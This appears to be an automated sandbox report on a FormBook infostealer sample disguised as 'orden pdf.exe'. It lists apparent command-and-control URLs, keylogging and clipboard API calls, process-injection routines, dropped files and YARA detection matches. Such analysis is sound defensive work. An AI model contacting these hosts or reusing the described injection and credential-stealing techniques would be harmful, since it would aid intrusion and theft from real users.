          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.joomlas123.info/n7ak/www.office4u.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.joomlas123.infoReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/MicrM
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.online
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.online/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.online/n7ak/www.ultimatewindowusa.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.onlineReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/www.manfast.online
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.info/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.info/n7ak/www.hanaleedossmann.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.infoReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.com/n7ak/www.joomlas123.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.com/n7ak/www.excelcapfunding.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.com/n7ak/www.bepbosch.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
          Source: orden pdf.exe, 00000000.00000003.250435560.0000000001712000.00000004.00000001.sdmpBinary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          AutoIt script contains suspicious stringsShow sources
          Source: orden pdf.exeAutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
          Source: DeviceCensus.exe.exe.0.drAutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
          Source: cx9l_rq2dula.exe.3.drAutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
          Binary is likely a compiled AutoIt script fileShow sources
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: This is a third-party compiled AutoIt script.
          Source: orden pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: This is a third-party compiled AutoIt script.
          Source: orden pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_014600AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_01461C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419850 NtCreateFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419900 NtReadFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419980 NtClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419A30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_004198FA NtReadFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041997A NtClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419A2A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A96D0 NtCreateKey,
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_3_00CE00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6606: CreateFileW,DeviceIoControl,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_0017E3B0
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00183200
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_00183B70
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001A410F
